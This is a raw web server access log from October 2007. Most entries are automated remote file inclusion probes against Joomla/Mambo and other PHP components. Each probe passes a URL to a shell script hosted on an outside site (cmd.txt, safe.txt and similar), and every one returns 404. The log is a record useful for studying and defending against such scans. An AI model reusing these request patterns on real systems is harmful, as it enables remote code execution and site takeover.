72.5.54.20 - - [28/Oct/2007:13:19:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
72.5.54.20 - - [28/Oct/2007:13:19:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
76.28.20.218 - - [28/Oct/2007:13:20:30 -0700] "GET /logs/access_070917.log/start.php?id=http://kk10.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
76.28.20.218 - - [28/Oct/2007:13:20:30 -0700] "GET /start.php?id=http://kk10.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
76.28.20.218 - - [28/Oct/2007:13:20:30 -0700] "GET /logs/start.php?id=http://kk10.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.5.54.20 - - [28/Oct/2007:13:21:05 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.20 - - [28/Oct/2007:13:21:05 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
209.35.191.105 - - [28/Oct/2007:13:21:08 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avelectronics.ca/cal//ws/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:13:21:16 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path%22http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:13:21:17 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path%22http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
72.5.54.20 - - [28/Oct/2007:13:21:46 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
72.5.54.20 - - [28/Oct/2007:13:21:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
209.216.213.40 - - [28/Oct/2007:13:23:24 -0700] "GET /logs/access_071001.log//spaw/dialogs/img_library.php?spaw_root=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
65.55.212.144 - - [28/Oct/2007:13:24:48 -0700] "GET /logs/ HTTP/1.0" 200 5212 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:13:24:51 -0700] "GET /logs/access_071008.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:13:24:52 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:13:25:06 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.111.45.30 - - [28/Oct/2007:13:25:28 -0700] "GET /logs/access_071001.log//spaw/dialogs/img_library.php?spaw_root=http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.58.151 - - [28/Oct/2007:13:25:57 -0700] "GET /logs/access_070820.log/index.php?pag=http://www.karadenizgaleri.com/karadenizforum/avatars/event/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.58.151 - - [28/Oct/2007:13:25:57 -0700] "GET /logs/index.php?pag=http://www.karadenizgaleri.com/karadenizforum/avatars/event/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.5.54.20 - - [28/Oct/2007:13:26:31 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.20 - - [28/Oct/2007:13:26:31 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.246.58.151 - - [28/Oct/2007:13:27:24 -0700] "GET /logs/access_070806.log/index.php?pag=http://www.karadenizgaleri.com/karadenizforum/avatars/event/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.35.191.105 - - [28/Oct/2007:13:27:50 -0700] "GET /logs/access_071008.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avelectronics.ca/cal//ws/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.105 - - [28/Oct/2007:13:27:50 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avelectronics.ca/cal//ws/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.29.73.171 - - [28/Oct/2007:13:28:20 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [28/Oct/2007:13:28:20 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.35.191.105 - - [28/Oct/2007:13:28:26 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avelectronics.ca/cal//ws/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:13:29:09 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path%22http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:13:29:09 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path%22http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
72.30.214.232 - - [28/Oct/2007:13:31:20 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
204.14.110.100 - - [28/Oct/2007:13:31:24 -0700] "GET //index.php3?s=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.176.90 - - [28/Oct/2007:13:31:33 -0700] "GET /logs/access_070826.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://c0cac0larul3z.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [28/Oct/2007:13:31:33 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://c0cac0larul3z.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:13:31:37 -0700] "GET /logs/access_071008.log/auto.php?inc=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:13:31:38 -0700] "GET /logs/access_071008.log/auto.php?inc=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.11.234.20 - - [28/Oct/2007:13:31:38 -0700] "GET /auto.php?inc=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:13:31:38 -0700] "GET /auto.php?inc=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:13:31:38 -0700] "GET /logs/auto.php?inc=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:13:31:38 -0700] "GET /logs/auto.php?inc=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:13:31:42 -0700] "GET /logs/access_070910.log/auto.php?inc=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:13:31:42 -0700] "GET /logs/access_070910.log/auto.php?inc=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.180.250.74 - - [28/Oct/2007:13:32:07 -0700] "GET /logs/access_071008.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:33:03 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:33:03 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
220.130.3.67 - - [28/Oct/2007:13:35:36 -0700] "GET /logs/access_070917.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.khabox.net/images/config.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.130.3.67 - - [28/Oct/2007:13:35:37 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.khabox.net/images/config.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.130.3.67 - - [28/Oct/2007:13:35:37 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.khabox.net/images/config.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:36:11 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:36:12 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
220.130.3.67 - - [28/Oct/2007:13:36:34 -0700] "GET /logs/access_071008.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.khabox.net/images/config.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.19.176.145 - - [28/Oct/2007:13:38:21 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.19.176.145 - - [28/Oct/2007:13:38:21 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:13:38:33 -0700] "GET /logs/access_070826.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:13:39:05 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:13:39:05 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:13:40:18 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:13:40:18 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.73.171 - - [28/Oct/2007:13:40:53 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.73.171 - - [28/Oct/2007:13:40:54 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.19.176.145 - - [28/Oct/2007:13:45:41 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
66.225.253.129 - - [28/Oct/2007:13:46:01 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:46:01 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:46:02 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:46:02 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:46:02 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:46:02 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.48.80.139 - - [28/Oct/2007:13:46:10 -0700] "GET //index.php?arquivo=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.48.80.139 - - [28/Oct/2007:13:46:12 -0700] "GET /logs/access_071015.log//index.php?arquivo=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.48.80.139 - - [28/Oct/2007:13:46:12 -0700] "GET /logs/access_071014.log//index.php?arquivo=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.48.80.139 - - [28/Oct/2007:13:46:15 -0700] "GET /logs//index.php?arquivo=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.19.176.145 - - [28/Oct/2007:13:46:30 -0700] "GET /logs/access_070820.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.26.24 - - [28/Oct/2007:13:48:44 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.19.151 - - [28/Oct/2007:13:48:45 -0700] "GET /cendoc/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.24.226 - - [28/Oct/2007:13:49:02 -0700] "GET /logs/ HTTP/1.0" 200 5212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.55.133.70 - - [28/Oct/2007:13:49:08 -0700] "GET /logs/access_071001.log//skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.55.133.70 - - [28/Oct/2007:13:49:08 -0700] "GET //skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.55.133.70 - - [28/Oct/2007:13:49:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.55.133.70 - - [28/Oct/2007:13:49:11 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.1.205.128 - - [28/Oct/2007:13:50:42 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:13:50:43 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:13:50:43 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.25.223.221 - - [28/Oct/2007:13:51:03 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.223.221 - - [28/Oct/2007:13:51:03 -0700] "GET //skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.223.221 - - [28/Oct/2007:13:51:04 -0700] "GET /logs/access_071001.log//skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.223.221 - - [28/Oct/2007:13:51:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.23.164 - - [28/Oct/2007:13:51:04 -0700] "GET /logs/?M=A HTTP/1.0" 200 5212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.25.223.221 - - [28/Oct/2007:13:51:04 -0700] "GET //skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.223.221 - - [28/Oct/2007:13:51:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.223.221 - - [28/Oct/2007:13:51:07 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.19.214 - - [28/Oct/2007:13:51:13 -0700] "GET /logs/scripts.log HTTP/1.0" 200 412805 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.25.223.221 - - [28/Oct/2007:13:51:37 -0700] "GET /logs/access_071001.log//skin/zero_vote/error.php?dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:13:51:49 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.180.250.117 - - [28/Oct/2007:13:51:50 -0700] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:13:51:58 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
200.85.47.250 - - [28/Oct/2007:13:51:59 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.23.122 - - [28/Oct/2007:13:52:38 -0700] "GET /logs/access_071028.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.28.212 - - [28/Oct/2007:13:52:42 -0700] "GET /cendoc/?D=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:54:14 -0700] "GET /logs/access.log//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:54:14 -0700] "GET //billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:54:15 -0700] "GET /logs//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:54:16 -0700] "GET /logs/access.log//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:54:17 -0700] "GET //billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:54:17 -0700] "GET /logs//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.90.87.194 - - [28/Oct/2007:13:54:22 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.90.87.194 - - [28/Oct/2007:13:54:26 -0700] "GET /logs/access_071015.log//modules/My_eGallery/index.php?basepath=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.90.87.194 - - [28/Oct/2007:13:54:30 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.90.87.194 - - [28/Oct/2007:13:54:38 -0700] "GET /logs/access_071001.log//modules/My_eGallery/index.php?basepath=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.90.87.194 - - [28/Oct/2007:13:54:59 -0700] "GET /logs/access_070806.log//modules/My_eGallery/index.php?basepath=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:55:23 -0700] "GET /logs/access.log//client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:55:23 -0700] "GET //client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.225.253.129 - - [28/Oct/2007:13:55:23 -0700] "GET /logs//client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:55:42 -0700] "GET /logs/access.log//client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:55:43 -0700] "GET //client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:55:43 -0700] "GET /logs//client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:56:37 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:58:36 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:59:05 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:59:07 -0700] "GET /logs/access_070820.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.76.18 - - [28/Oct/2007:13:59:33 -0700] "GET /index.php?pagina=http://www.khabox.net/images/lol.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
70.85.76.18 - - [28/Oct/2007:13:59:34 -0700] "GET /logs/index.php?pagina=http://www.khabox.net/images/lol.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
201.160.36.7 - - [28/Oct/2007:14:00:51 -0700] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
62.1.205.128 - - [28/Oct/2007:14:00:55 -0700] "GET /logs/access_070826.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
201.160.36.7 - - [28/Oct/2007:14:00:59 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
